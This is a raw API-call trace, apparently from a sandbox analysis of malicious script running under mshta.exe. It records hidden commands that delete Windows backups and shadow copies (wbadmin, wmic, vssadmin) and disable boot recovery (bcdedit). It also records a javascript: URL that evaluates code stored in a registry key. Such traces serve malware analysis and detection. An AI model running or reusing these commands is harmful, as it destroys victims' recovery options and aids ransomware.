0x66be40 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be60 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, 
Size=0x10) returned 0x671b78 [0074.245] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.245] IsCharSpaceW (wch=0x6f) returned 0 [0074.245] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.245] IsCharSpaceW (wch=0x6f) returned 0 [0074.245] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18ec74 | out: lpclsid=0x18ec74*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0074.245] SysStringLen (param_1=0x0) returned 0x0 [0074.245] CoGetClassObject (in: rclsid=0x18ec74*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec68 | out: ppv=0x18ec68*=0x28c1c60) returned 0x0 [0074.245] DllGetClassObject (in: rclsid=0x640cd4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec68 | out: ppv=0x18ec68*=0x28c1c60) returned 0x0 [0074.245] ??2@YAPAXI@Z () returned 0x28c1c60 [0074.245] ??2@YAPAXI@Z () returned 0x28c1c78 [0074.245] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18eaf0, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0074.245] lstrlenA (lpString="\\wscript.exe") returned 12 [0074.245] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29 [0074.246] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1 [0074.246] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1 [0074.246] ??3@YAXPAX@Z () returned 
0x1 [0074.246] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.246] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.246] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.246] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.246] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.246] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.247] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0") returned 0x3c [0074.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0074.247] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0074.247] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0074.580] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.580] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.580] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.580] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.580] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.581] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.581] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c wmic SHADOWCOPY DELETE", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c wmic SHADOWCOPY DELETE") 
returned 0x22 [0074.581] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wmic SHADOWCOPY DELETE", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wmic SHADOWCOPY DELETE", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0074.690] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.690] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.690] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.690] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.690] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.690] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.690] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.690] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c vssadmin Delete Shadows /All /Quiet", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c vssadmin Delete Shadows /All /Quiet") returned 0x2f [0074.690] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c vssadmin Delete Shadows /All /Quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c vssadmin Delete Shadows /All /Quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0074.867] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.868] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.868] ITypeInfo:LocalGetIDsOfNames 
(This=0x6738a8) returned 0x0 [0074.868] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.868] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.868] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.868] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.868] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c bcdedit /set {default} recoveryenabled No", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c bcdedit /set {default} recoveryenabled No") returned 0x35 [0074.868] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} recoveryenabled No", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} recoveryenabled No", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0075.009] IUnknown:Release (This=0x6738a8) returned 0x1 [0075.009] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0075.009] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0075.009] IUnknown:Release (This=0x6738a8) returned 0x1 [0075.009] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0075.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0075.009] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0075.009] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures") returned 0x45 [0075.010] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, 
nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0075.403] IUnknown:Release (This=0x6738a8) returned 0x1 [0075.404] GetCurrentThreadId () returned 0x2a8 [0075.404] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0075.404] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0075.405] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65eae0 [0075.405] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x683270 [0075.405] malloc (_Size=0x204) returned 0x28c36f8 [0075.405] ??2@YAPAXI@Z () returned 0x28c1ec8 [0075.405] GetCurrentThreadId () returned 0x2a8 [0075.405] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0075.405] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65eb28 [0075.415] PostMessageW (hWnd=0x40162, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0075.415] GetCurrentThreadId () returned 0x2a8 [0075.415] GetCurrentThreadId () returned 0x2a8 [0075.415] ISystemDebugEventFire:IsActive (This=0x65e300) returned 0x1 [0075.432] ??3@YAXPAX@Z () returned 0x1 [0075.432] free (_Block=0x28c11b0) [0075.432] GetCurrentThreadId () returned 0x2a8 [0075.432] GetCurrentThreadId () returned 0x2a8 [0075.432] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.432] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.432] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x668e08 | out: hHeap=0x610000) returned 1 [0075.432] IBindStatusCallback:OnStopBinding (This=0x6505a0, 
hresult=0x80004004, szError=0x0) returned 0x0 [0075.432] IBinding:RemoteGetBindResult (in: This=0x6520a0, pclsidProtocol=0x18f670, pdwResult=0x18f660, pszResult=0x18f654, dwReserved=0x0 | out: pclsidProtocol=0x18f670*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pdwResult=0x18f660*=0x80004004, pszResult=0x18f654*=0x0) returned 0x0 [0075.432] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f66c | out: pdwScheme=0x18f66c*=0xf) returned 0x0 [0075.432] IUnknown:QueryInterface (in: This=0x6520a0, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f630 | out: ppvObject=0x18f630*=0x0) returned 0x80004002 [0075.432] IUnknown:QueryInterface (in: This=0x652ab8, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f61c | out: ppvObject=0x18f61c*=0x0) returned 0x80004002 [0075.432] GetCurrentThreadId () returned 0x2a8 [0075.432] IUnknown:Release (This=0x6520a0) returned 0x3 [0075.433] RevokeBindStatusCallback (pBC=0x64e618, pBSCb=0x6505a0) returned 0x0 [0075.433] IUnknown:Release (This=0x6505a4) returned 0x4 [0075.433] IUnknown:Release (This=0x6505a0) returned 0x3 [0075.433] IUnknown:Release (This=0x64e618) returned 0x1 [0075.433] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f808 | out: hHeap=0x610000) returned 1 [0075.433] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644d58 | out: hHeap=0x610000) returned 1 [0075.433] GetCurrentThreadId () returned 0x2a8 [0075.433] GetCurrentThreadId () returned 0x2a8 [0075.433] SetEvent (hEvent=0x150) returned 1 [0075.435] CoTaskMemFree (pv=0x0) [0075.435] IInternetProtocolRoot:Terminate (This=0x652acc, dwOptions=0x0) returned 0x0 [0075.435] IUnknown:Release (This=0x652208) returned 0x4 [0075.435] ReleaseBindInfo 
(pbindinfo=0x652af0) [0075.435] IUnknown:Release (This=0x652ab8) returned 0x0 [0075.435] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d838 | out: hHeap=0x610000) returned 1 [0075.436] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652ab8 | out: hHeap=0x610000) returned 1 [0075.436] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0075.436] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0075.436] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0075.436] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0075.436] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0075.436] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0075.436] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f1e0 | out: lpPoint=0x18f1e0) returned 1 [0075.436] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.436] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x650760 [0075.437] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0075.437] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f070 | out: lpPoint=0x18f070) returned 1 [0075.437] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.437] GetCurrentThreadId () returned 0x2a8 [0075.437] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0075.437] GetCurrentThreadId () returned 0x2a8 [0075.437] GetCurrentThreadId () returned 0x2a8 [0075.437] DestroyWindow (hWnd=0x40162) returned 1 [0075.438] NtdllDefWindowProc_W () returned 0x0 [0075.446] NtdllDefWindowProc_W () returned 0x1 [0075.446] NtdllDefWindowProc_W () returned 0x0 [0075.447] NtdllDefWindowProc_W () returned 0x0 [0075.448] NtdllDefWindowProc_W () returned 0x0 [0075.448] NtdllDefWindowProc_W () returned 0x0 [0075.448] NtdllDefWindowProc_W () returned 0x0 [0075.448] GetWindowLongW 
(hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.448] GetParent (hWnd=0x202aa) returned 0x40162 [0075.448] GetParent (hWnd=0x40162) returned 0x50116 [0075.448] GetParent (hWnd=0x50116) returned 0x0 [0075.448] PostMessageW (hWnd=0x202aa, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0075.448] GetMessageTime () returned 125580 [0075.448] GetMessagePos () returned 0x35603df [0075.448] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f240 | out: lpPoint=0x18f240) returned 1 [0075.449] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f240 | out: lpPoint=0x18f240) returned 1 [0075.449] GetCapture () returned 0x0 [0075.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x18f47c | out: plResult=0x18f47c) returned 0x1 [0075.449] NtdllDefWindowProc_W () returned 0x0 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.450] GetMessageTime () returned 125580 [0075.450] GetMessagePos () returned 0x35603df [0075.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x18f084 | out: plResult=0x18f084) returned 0x0 [0075.450] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.450] GetMessageTime () returned 125580 [0075.450] GetMessagePos () returned 0x35603df [0075.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x18eab4 | out: plResult=0x18eab4) returned 0x0 [0075.450] GetCurrentThreadId () returned 0x2a8 
[0075.450] GetCurrentThreadId () returned 0x2a8 [0075.450] PostQuitMessage (nExitCode=0) [0075.450] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.451] RevokeDragDrop (hwnd=0x202aa) returned 0x0 [0075.451] GetCurrentThreadId () returned 0x2a8 [0075.451] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.451] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x18f5f8 | out: plResult=0x18f5f8) returned 0x1 [0075.451] NtdllDefWindowProc_W () returned 0x0 [0075.451] GetCurrentThreadId () returned 0x2a8 [0075.451] SetWindowLongW (hWnd=0x202aa, nIndex=-21, dwNewLong=0) returned 6562296 [0075.451] NtdllDefWindowProc_W () returned 0x0 [0075.452] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0075.452] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0075.452] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0075.452] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f3c0 | out: ppu=0x18f3c0) returned 0x0 [0075.452] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.452] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.452] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x650ac0 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x6510c8 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x686fb8 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x650c40 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651438 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x68) returned 
0x6875f0 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651598 [0075.454] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6875f0 | out: hHeap=0x610000) returned 1 [0075.454] GetSystemDefaultLCID () returned 0x409 [0075.454] GetVersionExW (in: lpVersionInformation=0x18f338*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x202aa, dwMinorVersion=0x18f350, dwBuildNumber=0x340808, dwPlatformId=0x77c6e36c, szCSDVersion="\x0f\x95v") | out: lpVersionInformation=0x18f338*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0075.454] GetKeyboardLayoutList (in: nBuff=32, lpList=0x18f2b8 | out: lpList=0x18f2b8) returned 1 [0075.454] GetSystemMetrics (nIndex=4096) returned 0 [0075.454] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0075.454] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0075.454] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0075.454] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0075.454] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0075.454] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0075.454] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0075.454] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0075.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2c) returned 0x6589e8 [0075.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x6515f0 [0075.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x64) returned 0x6875f0 [0075.454] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6875f0 | out: hHeap=0x610000) returned 1 [0075.456] SetTimer (hWnd=0x40162, nIDEvent=0x1008, 
uElapse=0x64, lpTimerFunc=0x0) returned 0x0 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.456] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6870c0 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d830 | out: hHeap=0x610000) returned 1 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f7f0 | out: hHeap=0x610000) returned 1 [0075.456] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.456] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0075.456] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f37c, dwFlags=0x0 | out: pdwZone=0x18f37c*=0xffffffff) returned 0x800c0011 [0075.457] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.457] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.457] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0075.457] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x2106, pPolicy=0x18f380, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x18f380*=0x0) returned 0x0 [0075.457] IUnknown:Release (This=0x63be1c) returned 0x3 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 
[0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x100) returned 0x6833a0 [0075.458] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.458] RedrawWindow (hWnd=0x0, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x686fb8 | out: hHeap=0x610000) returned 1 [0075.463] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6499b0, Size=0x14) returned 0x6499b0 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d328 | out: hHeap=0x610000) returned 1 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6870c0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650270 | out: hHeap=0x610000) returned 1 [0075.464] IUnknown:Release (This=0x63c68c) returned 0xa [0075.464] IUnknown:Release (This=0x63c68c) returned 0x9 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x693fe8 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652b58 | out: hHeap=0x610000) returned 1 [0075.464] 
